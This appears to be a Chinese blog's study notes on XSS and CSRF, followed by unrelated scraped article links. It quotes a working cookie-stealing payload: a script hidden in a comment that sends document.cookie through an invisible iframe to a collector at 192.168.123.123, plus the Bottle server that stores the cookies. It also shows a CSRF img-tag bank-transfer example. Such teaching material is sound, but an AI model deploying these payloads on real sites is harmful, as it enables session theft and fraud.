XSS：脚本中的不速之客
XSS：跨站脚本（Cross-site scripting）
CSRF：冒充用户之手
CSRF：跨站请求伪造（Cross-site request forgery）

谷歌搜索到几篇好文章。

《XSS CSRF 攻击》
http://www.cnblogs.com/siqi/archive/2012/11/19/2777224.html

XSS 是实现 CSRF 的诸多途径中的一条，但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF。

请求令牌（一种简单有效的防御方法）。

（本人）：
django默认使用这种方法，之前图方便关闭了该middle，花一几个小时将它开启，本身也是学习CSRF的方式。

《XSS、CSRF漏洞及如何测试介绍》
http://www.diggerplus.org/archives/2099

XSS攻击:
非持久型 = 反射型XSS漏洞，比较被动，用户点击特定构造url后生效。
持久性 = 保存型XSS漏洞，储存与数据库。
基于DOM的XSS漏洞原理：主要是转送和劫持会话session

《总结 XSS 与 CSRF 两种跨站攻击》
https://blog.tonyseek.com/post/introduce-to-xss-and-csrf/
例子，攻击方的接受器，XSS注入内容：

#!/usr/bin/env python

#-*- coding:utf-8 -*-

"""

跨站脚本注入的信息收集服务器

"""

import bottle

app = bottle.Bottle()

plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')

app.install(plugin)

@app.route('/myxss/')

def show(cookies, db):

    SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'

    try:

        db.execute(SQL, cookies)

    except:

        pass

    return ""

if __name__ == "__main__":

    app.run()

// 用 <script type="text/javascript"></script> 包起来放在评论中

(function(window, document) {

    // 构造泄露信息用的 URL

    var cookies = document.cookie;

    var xssURIBase = "http://192.168.123.123/myxss/";

    var xssURI = xssURIBase + window.encodeURI(cookies);

    // 建立隐藏 iframe 用于通讯

    var hideFrame = document.createElement("iframe");

    hideFrame.height = 0;

    hideFrame.width = 0;

    hideFrame.style.display = "none";

    hideFrame.src = xssURI;

    // 开工

    document.body.appendChild(hideFrame);

})(window, document);

每个访问到含有该评论的页面的用户都会遇到麻烦——他们不知道背后正悄悄的发起了一个请求，是他们所看不到的。而这个请求，会把包含了他们的帐号和其他隐私的信息发送到收集服务器上。

《漏洞科普：对于XSS和CSRF你究竟了解多少》
http://sbqing.com/archives/1487.html
http://www.bugsec.org/986.html
示例1：
银行网站A，它以GET请求来完成银行转账的操作，如：

http://www.mybank.com/Transfer.php?toBankId=11&money=1000
1
    
http://www.mybank.com/Transfer.php?toBankId=11&money=1000

危险网站B，它里面有一段HTML的代码如下：
<img src=http://www.mybank.com/Transfer.php?toBankId=11&money=1000>
1
    
<img src=http://www.mybank.com/Transfer.php?toBankId=11&money=1000>

首先，你登录了银行网站A，然后访问危险网站B，噢，这时你会发现你的银行账户少了1000块……
为什么会这样呢？原因是银行网站A违反了HTTP规范，使用GET请求更新资源。在访问危险网站B的之前，你已经登录了银行网站A，而B中的<img>以GET的方式请求第三方资源（这里的第三方就是指银行网站了，原本这是一个合法的请求，但这里被不法分子利用了），所以你的浏览器会带上你的银行网站A的Cookie发出Get请求，去获取资源“http://www.mybank.com/Transfer.php?toBankId=11&money=1000”，结果银行网站服务器收到请求后，认为这是一个更新资源操作（转账操作），所以就立刻进行转账操作……

《关于XSS（跨站脚本攻击）和CSRF（跨站请求伪造）》
http://cnodejs.org/topic/50463565329c5139760c34a1
图片注入，有些sns社区可以让用户自己上传图片，然后填写ref属性或者title属性，这些属性往往会成为注入点，如果应用程序文件名没有修改的话也可能被注入。更有胜者，在新版本的discuz中，用户可以分享照片还可以查看照片的exif信息，比如光圈相机型号等等，有达人用软件修改了exif信息，在里面嵌入恶意js代码，然后吸引用户查看exif信息。

【实习记】2014-08-23网络安全XSS与CSRF总结的更多相关文章

1. 2014&sol;08&sol;23——OJ出现waiting&period;&period;&period;

   问题: 今天中午,裴主解决OJ他缓慢的问题后,开着.我跟着oj他递给发现了一个话题waiting该．．．．． 和全哥.均觉得測评程序挂了.于是重新启动測系统,还waiting.....(測评系统的进程 ...

2. 2014&sol;08&sol;23——OJ及相关站点打开速度非常慢，训练计划login直接error！

   问题: 这个问题存在已经将近一个星期了.刚開始时发现OJ及相关的站点有时候打开有点慢,那时候也没在意,后来时快时慢的越来越频繁:今天早上直接一直都打开非常慢(无论什么时候.这样的情况);训练计划和做题 ...

3. 【实习记】2014-09-26恢复linux下误删的ntfs盘中的文件

       情景,ubuntu下把NTFS格式的盘中的“实习记”文件夹彻底删除了,追毁莫及,粗心觉不是一件好的事情. linux下回复ntfs盘下的文件不能用ext3grep,而使用debugfs命令实在 ...

4. 2016年12月28日 星期三 --出埃及记 Exodus 21&colon;23

   2016年12月28日 星期三 --出埃及记 Exodus 21:23 But if there is serious injury, you are to take life for life,若有 ...

5. 2016年12月2日 星期五 --出埃及记 Exodus 20&colon;23

   2016年12月2日 星期五 --出埃及记 Exodus 20:23 Do not make any gods to be alongside me; do not make for yourselv ...

6. 2016年11月7日 星期一 --出埃及记 Exodus 19&colon;23

   2016年11月7日 星期一 --出埃及记 Exodus 19:23 Moses said to the LORD, "The people cannot come up Mount Sin ...

7. 2016年10月12日 星期三 --出埃及记 Exodus 18&colon;23

   2016年10月12日 星期三 --出埃及记 Exodus 18:23 If you do this and God so commands, you will be able to stand th ...

8. 2016年6月26日 星期日 --出埃及记 Exodus 14&colon;23

   2016年6月26日 星期日 --出埃及记 Exodus 14:23 The Egyptians pursued them, and all Pharaoh's horses and chariots ...

9. http&colon;&sol;&sol;www&period;cnblogs&period;com&sol;gaojing&sol;archive&sol;2011&sol;08&sol;23&sol;2413616&period;html

   http://www.cnblogs.com/gaojing/archive/2011/08/23/2413616.html

随机推荐

1. css深入理解z-index

   z-index取值 z-index:auto;z-index:<integer>;z-index:inherit;继承 特性: 1.支持负值2.支持css3 animation动画;3.在 ...

2. 你应该知道的基础 Git 命令

   我们在早先一篇文章中已经快速介绍过 Vi 速查表了.在这篇文章里,我们将会介绍开始使用 Git 时所需要的基础命令. Git Git 是一个分布式版本控制系统,它被用在大量开源项目中.它是在 2005 ...

3. NOIP201504推销员

   #include<iostream> #include<cstring> #include<algorithm> #include<cmath> #in ...

4. Java&colon;java中BufferedReader的read&lpar;&rpar;及readLine&lpar;&rpar;方法的使用心得

   BufferedReader的readLine()方法是阻塞式的, 如果到达流末尾, 就返回null, 但如果client的socket末经关闭就销毁, 则会产生IO异常. 正常的方法就是使用sock ...

5. 详解python命名空间和作用域

   1.典型案例 先从几个典型的案例来看下名称空间及作用域对python代码运行的影响,请看下面几个代码实例及其执行结果,是否符合你的预期. 代码1:块作用域 if True: i = 1 print i ...

6. xpadder教程：自定义设置游戏手柄的图片

   关于xpadder设置按键的教程,网上已经很多,我就不凑这个热闹了.这里介绍的是如何自定义设置手柄的图片,就是按钮的背景图,如下图所示: 步骤: 1)准备一张背景图 注意:格式必须是24位色的BMP位 ...

7. psql备份和恢复（ubuntu）

   备份 sudo pg_dump -U  username  -f  filename.sql  dbname 恢复 psql -U username -f filename.sql dbname -- ...

8. Attr类中进行类型推断

   涉及到重要的类的继承关系如下图所示. 关于抛出的异常继承体系:

9. 关于servlet3&period;0中的异步servlet

   刚看了一下*上的介绍,servlet3.0是2009年随着JavaEE6.0发布的: 到现在已经有六七年的时间了,在我第一次接触java的时候(2011年),servlet3.0就已经出现很久了 ...

10. HDU 4857 拓扑排序 优先队列

    n个数,已经有大小关系,现给m个约束,规定a在b之前,剩下的数要尽可能往前移.输出序列 大小关系显然使用拓扑结构,关键在于n个数本身就有大小关系,那么考虑反向建图,优先选择值最大的入度为零的点,这样得 ...